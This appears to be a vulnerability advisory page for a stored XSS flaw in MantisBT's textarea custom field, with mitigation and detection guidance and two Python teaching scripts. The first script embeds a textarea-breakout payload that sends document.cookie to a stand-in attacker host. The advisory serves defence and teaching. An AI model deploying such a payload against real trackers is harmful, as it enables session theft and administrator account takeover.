CVE-2026-39960
Status: Deferred - Pending Action
Stored XSS in MantisBT via Textarea Custom Field

Publication date: 2026-05-20

Last updated on: 2026-05-20

Assigner: GitHub, Inc.

Description
Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field's contents on the Update Issue page (bug_update_page.php), allowing an attacker to inject HTML and, if CSP settings permit, execute arbitrary JavaScript when the page is loaded. This facilitates session theft, which can lead to admin account takeover and full access to project data. To exploit this issue, a textarea-type custom field must be configured for the project, and the attack must be carried out by an authenticated user with bug report permission (a low privilege). Any user viewing the bug edit form, including administrators, can be affected. The issue has been fixed in version 2.28.2. Users who cannot immediately upgrade can work around the issue by using the default Content-Security Policy, which blocks script execution.
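Because the flaw is an output-escaping bug, it helps to see concretely why an unescaped textarea is exploitable even though browsers treat textarea content as text. The Python model below is an added example written for this page, not MantisBT's own (PHP) code: it renders a minimal update form in the flawed way and in the fixed way, reproduces the browser rule that the first `</textarea` ends the element, and checks whether a stored value can reach HTML context. The field name `custom_field_42`, the payload and the benign sample value are constructed for the illustration.

```python
import html

# Constructed payload. Inside <textarea> the browser treats content as text, so a bare
# "<script>" is inert; the dangerous part is the unescaped "</textarea>", which closes
# the element and puts the rest of the stored value back into HTML context.
PAYLOAD = (
    '</textarea><script>'
    'new Image().src="https://attacker.invalid/?c="+encodeURIComponent(document.cookie)'
    '</script><textarea>'
)

# Constructed benign value: legitimate text that happens to contain markup characters.
BENIGN = "if a < b && c > d\nsee <config> for details"


def render_textarea_vulnerable(field_name: str, stored_value: str) -> str:
    """Models the flawed pattern: the stored custom-field value is written into the
    update form verbatim (illustration only, not MantisBT's actual template)."""
    return f'<textarea name="{field_name}">{stored_value}</textarea>'


def render_textarea_fixed(field_name: str, stored_value: str) -> str:
    """Same form with the value escaped at output time: '<', '>', '&' and quotes become
    character references, so no stored value can terminate the textarea early."""
    return f'<textarea name="{field_name}">{html.escape(stored_value, quote=True)}</textarea>'


def _textarea_body_span(markup: str) -> tuple:
    """Locate the text content of the first <textarea>: from the end of its start tag
    to the first '</textarea' (case-insensitive), which is where a browser ends it."""
    lower = markup.lower()
    start = lower.find("<textarea")
    if start == -1:
        return (0, 0)
    body_start = lower.find(">", start) + 1
    end = lower.find("</textarea", body_start)
    return (body_start, len(markup) if end == -1 else end)


def script_reaches_html_context(markup: str) -> bool:
    """True if a <script tag appears after the point where the browser closes the
    textarea, i.e. the stored value broke out of the text context."""
    _, end = _textarea_body_span(markup)
    return "<script" in markup[end:].lower()


def displayed_text(markup: str) -> str:
    """What the user sees in the box: the textarea body with character references
    decoded (browsers decode them inside textarea content)."""
    body_start, end = _textarea_body_span(markup)
    return html.unescape(markup[body_start:end])


if __name__ == "__main__":
    for label, render in (("vulnerable", render_textarea_vulnerable),
                          ("fixed", render_textarea_fixed)):
        page = render("custom_field_42", PAYLOAD)
        print(f"{label}: script reaches HTML context = {script_reaches_html_context(page)}")
    print("fixed rendering shows benign text unchanged:",
          displayed_text(render_textarea_fixed("custom_field_42", BENIGN)) == BENIGN)
```

The fixed rendering stores the value unchanged and escapes only at output, which is the right place for this class of bug: the user still sees exactly the text they typed (including the literal payload, now harmless), while nothing in the value can close the element. A CSP only changes whether the breakout's script runs; the breakout itself is what the escaping removes.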
Meta Information
Generated: 2026-06-10
AI Q&A: 2026-05-21
EPSS Evaluated: 2026-06-08
Source: NVD
Affected Vendors & Products (2 associated CPEs)
Vendor    Product             Version / Range
mantisbt  mantis_bug_tracker  up to 2.28.2 (excluding)
mantisbt  mantis_bug_tracker  2.28.2
CWE
CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
AI Quick Actions
Executive Summary

Mantis Bug Tracker (MantisBT) versions 2.28.1 and below have a vulnerability due to flawed logic that causes improper escaping of a textarea custom field's contents on the Update Issue page (bug_update_page.php). This flaw allows an attacker to inject HTML and, if Content-Security Policy (CSP) settings permit, execute arbitrary JavaScript when the page is loaded.

To exploit this vulnerability, a textarea-type custom field must be configured for the project, and the attacker must be an authenticated user with bug report permission, which is a low privilege level.

The injected script can lead to session theft, enabling the attacker to take over admin accounts and gain full access to project data.

Impact Analysis

This vulnerability can lead to session theft and administrative account takeover, which means an attacker can gain full access to project data.

Since the attacker only needs low privilege bug report permission to exploit the issue, it poses a significant risk to the confidentiality and integrity of the data managed by MantisBT.

Any user viewing the bug edit form, including administrators, can be affected by the injected malicious code.

Mitigation Strategies

To mitigate this vulnerability immediately, upgrade Mantis Bug Tracker to version 2.28.2 or later where the issue is fixed.

If upgrading is not possible right away, keep (or restore) MantisBT's default Content-Security Policy (CSP), which blocks execution of the injected script. This is only a workaround: the HTML injection itself remains possible until the upgrade, so it should not be treated as a fix.

Compliance Impact

The vulnerability allows an attacker to inject HTML and potentially execute arbitrary JavaScript, leading to session theft and admin account takeover, and with it unauthorized access to full project data.

Unauthorized access and data exposure of this kind could affect compliance with standards and regulations such as GDPR and HIPAA, which require protection of sensitive data and prevention of unauthorized access. The advisory itself makes no statement about compliance impact.

Detection Guidance

This vulnerability involves improper escaping of textarea custom field contents in the Update Issue page (bug_update_page.php) of Mantis Bug Tracker versions 2.28.1 and below, allowing stored XSS attacks.

To detect this vulnerability on your system, check the installed MantisBT version: every release before 2.28.2 is affected. MantisBT records its release in core/constant_inc.php as the MANTIS_VERSION constant.

You can also confirm the flaw directly on a test instance. As an authenticated user with bug report permission, store a harmless marker such as </textarea><b>xss-test</b> in a textarea-type custom field (one must be configured for the project), then open the Update Issue page (bug_update_page.php) for that issue with a web proxy or browser developer tools and check whether the marker is rendered as markup rather than shown as text inside the field. Prefer an HTML marker over a script payload: the HTML injection is present regardless of CSP, whereas a script will not run when the default CSP is in place, which would hide the flaw.

For command-line detection, you can use commands to check the installed version of MantisBT, for example:

  • grep -n MANTIS_VERSION /path/to/mantisbt/core/constant_inc.php
  • dpkg -l | grep -i mantis (on Debian-based systems if installed via package manager)
  • rpm -qa | grep -i mantis (on RPM-based systems)
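The version and CSP conditions above decide between the three outcomes the advisory distinguishes: not affected, HTML injection only, and HTML injection plus script execution. The Python script below is an added example written for this page, not a MantisBT or NVD tool: it reads the release from core/constant_inc.php, where MantisBT defines the MANTIS_VERSION constant, compares it against 2.28.2, and evaluates a Content-Security-Policy header to say whether an injected inline script would run. It also serves the CSP workaround in the Mitigation Strategies section. The PHP fragment and the three policy headers are constructed samples; a real check would read the file from the install and the header from an HTTP response.

```python
import re

FIXED_VERSION = (2, 28, 2)  # first release containing the fix, per the advisory

# Constructed sample of MantisBT's core/constant_inc.php from a vulnerable install.
# MantisBT records its release there as the MANTIS_VERSION constant.
SAMPLE_CONSTANT_INC = """<?php
# Mantis - a php based bugtracking system
define( 'MANTIS_VERSION', '2.28.1' );
"""

# Constructed response headers: a permissive policy an admin might have configured,
# a nonce-based policy, and a plain self-only policy.
CSP_UNSAFE_INLINE = "default-src 'self'; script-src 'self' 'unsafe-inline'"
CSP_NONCE = "default-src 'self'; script-src 'self' 'nonce-d2FsdGVy'"
CSP_SELF_ONLY = "default-src 'self'; frame-ancestors 'self'"


def parse_mantis_version(php_source: str) -> tuple:
    """Extract MANTIS_VERSION as a comparable (major, minor, patch) tuple.
    Suffixes such as '-dev' are ignored; missing components count as 0."""
    m = re.search(r"define\(\s*'MANTIS_VERSION'\s*,\s*'([^']+)'\s*\)", php_source)
    if not m:
        raise ValueError("MANTIS_VERSION not found")
    nums = [int(x) for x in re.findall(r"\d+", m.group(1))[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def is_vulnerable_version(version: tuple) -> bool:
    """Every release before 2.28.2 is affected."""
    return version < FIXED_VERSION


def inline_script_allowed(csp_header) -> bool:
    """Would an injected inline <script> (which carries no valid nonce or hash) run?
    True when there is no policy at all, or when the effective script directive lists
    'unsafe-inline' without any nonce/hash source (a nonce or hash source makes
    browsers ignore 'unsafe-inline')."""
    if not csp_header or not csp_header.strip():
        return True
    directives = {}
    for directive in csp_header.split(";"):
        tokens = directive.split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    if "script-src" in directives:
        sources = directives["script-src"]
    elif "default-src" in directives:
        sources = directives["default-src"]  # fallback when script-src is absent
    else:
        return True  # neither directive present: scripts are unrestricted
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in sources
    )
    return "'unsafe-inline'" in sources and not has_nonce_or_hash


def assess(php_source: str, csp_header) -> str:
    """Combine both checks into the three outcomes the advisory distinguishes."""
    if not is_vulnerable_version(parse_mantis_version(php_source)):
        return "not affected"
    if inline_script_allowed(csp_header):
        return "exploitable: HTML injection and script execution"
    return "HTML injection only: CSP blocks script execution, upgrade still required"


if __name__ == "__main__":
    print("version:", parse_mantis_version(SAMPLE_CONSTANT_INC))
    for name, header in (("unsafe-inline", CSP_UNSAFE_INLINE),
                         ("nonce", CSP_NONCE), ("self-only", CSP_SELF_ONLY)):
        print(f"{name}: {assess(SAMPLE_CONSTANT_INC, header)}")
```

The CSP evaluator is deliberately minimal (it ignores script-src-elem, report-only headers and meta-tag policies), but it captures the check that matters here: with no nonce or hash in play, an injected inline script runs only if the effective script directive contains 'unsafe-inline'. Even when the result is "HTML injection only", the page is still affected and the upgrade to 2.28.2 remains the fix.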
